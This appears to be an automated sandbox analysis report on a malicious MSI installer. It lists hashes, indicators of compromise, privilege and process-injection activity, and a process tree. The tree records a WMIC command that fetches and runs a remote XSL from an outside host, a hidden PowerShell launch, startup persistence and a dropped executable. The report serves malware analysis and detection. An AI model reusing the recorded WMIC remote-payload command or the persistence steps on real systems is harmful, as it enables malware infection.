72b228f51cf5a1b7600f0e0848145e4e54e54838977a5a5b1c85f69b64b92cf5

Analysis

max time kernel
121s
max time network
121s
platform
windows7_x64
resource
win7-en-20211014
submitted
02-12-2021 11:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

test/91B5DB3C0CCBD68BD04C24571E27F99D.msi
Size

277KB
MD5

91b5db3c0ccbd68bd04c24571e27f99d
SHA1

b01cb4fe38315d41fcbe9c6278ebe4574496ab0d
SHA256

ec85138598c57c6a6bdb5ed470614f582d3b5a8c6b243eb2f41b9970ea13d130
SHA512

9f0b07f961625fcc06ee64fcfe5e35e0d40db81f75c3cbc584434c1925fac241db69cac3c1a1bf329d965a4df9bdaa53c13bb8ea3206e2c9d4facf7f74ba21b7

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
5	1928	MsiExec.exe
7	1340	WMIC.exe
9	1088	MsiExec.exe
10	732	powershell.exe

Executes dropped EXE 3 IoCs

pid	Process
1884	lc869D.tmp
1104	nvsmartmaxapp.exe
1432	gup.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nvsmartmaxapp.lnk	powershell.exe

Loads dropped DLL 9 IoCs

pid	Process
1088	MsiExec.exe
1088	MsiExec.exe
1088	MsiExec.exe
1088	MsiExec.exe
1088	MsiExec.exe
1104	nvsmartmaxapp.exe
896	wmplayer.exe
1432	gup.exe
1532	iexplore.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 10 IoCs

description	ioc	Process
File created	C:\Windows\Installer\f7648d3.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI6C5A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9B98.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f7648d5.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\f7648d3.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI7734.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8548.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8E10.tmp	msiexec.exe
File created	C:\Windows\Installer\f7648d5.ipi	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
732	powershell.exe
732	powershell.exe
1500	msiexec.exe
1500	msiexec.exe
732	powershell.exe
732	powershell.exe
896	wmplayer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1116	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1116	msiexec.exe
Token: SeRestorePrivilege	1500	msiexec.exe
Token: SeTakeOwnershipPrivilege	1500	msiexec.exe
Token: SeSecurityPrivilege	1500	msiexec.exe
Token: SeCreateTokenPrivilege	1116	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	1116	msiexec.exe
Token: SeLockMemoryPrivilege	1116	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1116	msiexec.exe
Token: SeMachineAccountPrivilege	1116	msiexec.exe
Token: SeTcbPrivilege	1116	msiexec.exe
Token: SeSecurityPrivilege	1116	msiexec.exe
Token: SeTakeOwnershipPrivilege	1116	msiexec.exe
Token: SeLoadDriverPrivilege	1116	msiexec.exe
Token: SeSystemProfilePrivilege	1116	msiexec.exe
Token: SeSystemtimePrivilege	1116	msiexec.exe
Token: SeProfSingleProcessPrivilege	1116	msiexec.exe
Token: SeIncBasePriorityPrivilege	1116	msiexec.exe
Token: SeCreatePagefilePrivilege	1116	msiexec.exe
Token: SeCreatePermanentPrivilege	1116	msiexec.exe
Token: SeBackupPrivilege	1116	msiexec.exe
Token: SeRestorePrivilege	1116	msiexec.exe
Token: SeShutdownPrivilege	1116	msiexec.exe
Token: SeDebugPrivilege	1116	msiexec.exe
Token: SeAuditPrivilege	1116	msiexec.exe
Token: SeSystemEnvironmentPrivilege	1116	msiexec.exe
Token: SeChangeNotifyPrivilege	1116	msiexec.exe
Token: SeRemoteShutdownPrivilege	1116	msiexec.exe
Token: SeUndockPrivilege	1116	msiexec.exe
Token: SeSyncAgentPrivilege	1116	msiexec.exe
Token: SeEnableDelegationPrivilege	1116	msiexec.exe
Token: SeManageVolumePrivilege	1116	msiexec.exe
Token: SeImpersonatePrivilege	1116	msiexec.exe
Token: SeCreateGlobalPrivilege	1116	msiexec.exe
Token: SeRestorePrivilege	1500	msiexec.exe
Token: SeTakeOwnershipPrivilege	1500	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1340	WMIC.exe
Token: SeSecurityPrivilege	1340	WMIC.exe
Token: SeTakeOwnershipPrivilege	1340	WMIC.exe
Token: SeLoadDriverPrivilege	1340	WMIC.exe
Token: SeSystemProfilePrivilege	1340	WMIC.exe
Token: SeSystemtimePrivilege	1340	WMIC.exe
Token: SeProfSingleProcessPrivilege	1340	WMIC.exe
Token: SeIncBasePriorityPrivilege	1340	WMIC.exe
Token: SeCreatePagefilePrivilege	1340	WMIC.exe
Token: SeBackupPrivilege	1340	WMIC.exe
Token: SeRestorePrivilege	1340	WMIC.exe
Token: SeShutdownPrivilege	1340	WMIC.exe
Token: SeDebugPrivilege	1340	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1340	WMIC.exe
Token: SeRemoteShutdownPrivilege	1340	WMIC.exe
Token: SeUndockPrivilege	1340	WMIC.exe
Token: SeManageVolumePrivilege	1340	WMIC.exe
Token: 33	1340	WMIC.exe
Token: 34	1340	WMIC.exe
Token: 35	1340	WMIC.exe
Token: SeRestorePrivilege	1500	msiexec.exe
Token: SeTakeOwnershipPrivilege	1500	msiexec.exe
Token: SeIncreaseQuotaPrivilege	1340	WMIC.exe
Token: SeSecurityPrivilege	1340	WMIC.exe
Token: SeTakeOwnershipPrivilege	1340	WMIC.exe
Token: SeLoadDriverPrivilege	1340	WMIC.exe
Token: SeSystemProfilePrivilege	1340	WMIC.exe
Token: SeSystemtimePrivilege	1340	WMIC.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1116	msiexec.exe
1116	msiexec.exe

Suspicious use of WriteProcessMemory 43 IoCs

description	pid	Process	procid_target
PID 1500 wrote to memory of 1928	1500	msiexec.exe	29
PID 1500 wrote to memory of 1928	1500	msiexec.exe	29
PID 1500 wrote to memory of 1928	1500	msiexec.exe	29
PID 1500 wrote to memory of 1928	1500	msiexec.exe	29
PID 1500 wrote to memory of 1928	1500	msiexec.exe	29
PID 1928 wrote to memory of 1340	1928	MsiExec.exe	32
PID 1928 wrote to memory of 1340	1928	MsiExec.exe	32
PID 1928 wrote to memory of 1340	1928	MsiExec.exe	32
PID 1500 wrote to memory of 1088	1500	msiexec.exe	34
PID 1500 wrote to memory of 1088	1500	msiexec.exe	34
PID 1500 wrote to memory of 1088	1500	msiexec.exe	34
PID 1500 wrote to memory of 1088	1500	msiexec.exe	34
PID 1500 wrote to memory of 1088	1500	msiexec.exe	34
PID 1500 wrote to memory of 1088	1500	msiexec.exe	34
PID 1500 wrote to memory of 1088	1500	msiexec.exe	34
PID 1340 wrote to memory of 732	1340	WMIC.exe	35
PID 1340 wrote to memory of 732	1340	WMIC.exe	35
PID 1340 wrote to memory of 732	1340	WMIC.exe	35
PID 1088 wrote to memory of 1884	1088	MsiExec.exe	37
PID 1088 wrote to memory of 1884	1088	MsiExec.exe	37
PID 1088 wrote to memory of 1884	1088	MsiExec.exe	37
PID 1088 wrote to memory of 1884	1088	MsiExec.exe	37
PID 1088 wrote to memory of 1884	1088	MsiExec.exe	37
PID 1088 wrote to memory of 1884	1088	MsiExec.exe	37
PID 1088 wrote to memory of 1884	1088	MsiExec.exe	37
PID 732 wrote to memory of 1104	732	powershell.exe	39
PID 732 wrote to memory of 1104	732	powershell.exe	39
PID 732 wrote to memory of 1104	732	powershell.exe	39
PID 732 wrote to memory of 1104	732	powershell.exe	39
PID 1104 wrote to memory of 896	1104	nvsmartmaxapp.exe	40
PID 1104 wrote to memory of 896	1104	nvsmartmaxapp.exe	40
PID 1104 wrote to memory of 896	1104	nvsmartmaxapp.exe	40
PID 1104 wrote to memory of 896	1104	nvsmartmaxapp.exe	40
PID 1104 wrote to memory of 896	1104	nvsmartmaxapp.exe	40
PID 1560 wrote to memory of 1432	1560	taskeng.exe	42
PID 1560 wrote to memory of 1432	1560	taskeng.exe	42
PID 1560 wrote to memory of 1432	1560	taskeng.exe	42
PID 1560 wrote to memory of 1432	1560	taskeng.exe	42
PID 1432 wrote to memory of 1532	1432	gup.exe	43
PID 1432 wrote to memory of 1532	1432	gup.exe	43
PID 1432 wrote to memory of 1532	1432	gup.exe	43
PID 1432 wrote to memory of 1532	1432	gup.exe	43
PID 1432 wrote to memory of 1532	1432	gup.exe	43

C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\test\91B5DB3C0CCBD68BD04C24571E27F99D.msi
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1116

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1500
- C:\Windows\system32\MsiExec.exe
  C:\Windows\system32\MsiExec.exe -Embedding 860EFC005E1CDFC03427BB24323CADA7
  2⤵
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  PID:1928
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" process get executablepath^,status /format:"http://barbosaoextra.com.br/dados/noticia/7/imagem/noar.xsl"
    3⤵
    - Blocklisted process makes network request
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1340
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\Admin.ps1" -WindowStyle Hidden
      4⤵
      Blocklisted process makes network request
      Drops startup file
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:732
    - - C:\Users\Admin\AppData\Roaming\mgEpoO\nvsmartmaxapp.exe
        
        "C:\Users\Admin\AppData\Roaming\mgEpoO\nvsmartmaxapp.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        
        PID:1104
      - C:\Program Files (x86)\Windows Media Player\wmplayer.exe
        
        "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
        6⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:896
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 858E5C33C24697FCC09642D071329959
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1088
- - C:\Users\Admin\AppData\Local\Temp\lc869D.tmp
    "C:\Users\Admin\AppData\Local\Temp\lc869D.tmp"
    3⤵
    - Executes dropped EXE
    PID:1884

C:\Windows\system32\taskeng.exe
taskeng.exe {8EC06547-DA73-4E8C-B489-8E1DDD8A5E65} S-1-5-21-2955169046-2371869340-1800780948-1000:UKNHJUQT\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:1560
- C:\Users\Admin\AppData\Roaming\mgEpoO\gup.exe
  C:\Users\Admin\AppData\Roaming\mgEpoO\gup.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1432
- - C:\Program Files (x86)\Internet Explorer\iexplore.exe
    "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
    3⤵
    - Loads dropped DLL
    PID:1532

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/732-71-0x0000000002422000-0x0000000002424000-memory.dmp

Filesize
8KB

Download
memory/732-72-0x0000000002424000-0x0000000002427000-memory.dmp

Filesize
12KB

Download
memory/732-83-0x000000001C690000-0x000000001C6A9000-memory.dmp

Filesize
100KB

Download
memory/732-70-0x0000000002420000-0x0000000002422000-memory.dmp

Filesize
8KB

Download
memory/732-73-0x000000001B740000-0x000000001BA3F000-memory.dmp

Filesize
3.0MB

Download
memory/732-69-0x000007FEF2B90000-0x000007FEF36ED000-memory.dmp

Filesize
11.4MB

Download
memory/732-80-0x000000000242B000-0x000000000244A000-memory.dmp

Filesize
124KB

Download
memory/896-90-0x00000000000C0000-0x00000000000C1000-memory.dmp

Filesize
4KB

Download
memory/896-93-0x0000000001EC0000-0x000000000223D000-memory.dmp

Filesize
3.5MB

Download
memory/896-97-0x00000000001D0000-0x00000000001D1000-memory.dmp

Filesize
4KB

Download
memory/1088-62-0x0000000076231000-0x0000000076233000-memory.dmp

Filesize
8KB

Download
memory/1104-88-0x0000000000800000-0x0000000000B7D000-memory.dmp

Filesize
3.5MB

Download
memory/1104-96-0x0000000000120000-0x0000000000121000-memory.dmp

Filesize
4KB

Download
memory/1116-55-0x000007FEFBB91000-0x000007FEFBB93000-memory.dmp

Filesize
8KB

Download
memory/1432-103-0x0000000000330000-0x0000000000453000-memory.dmp

Filesize
1.1MB

Download
memory/1928-59-0x00000000002D0000-0x00000000002E0000-memory.dmp

Filesize
64KB

Download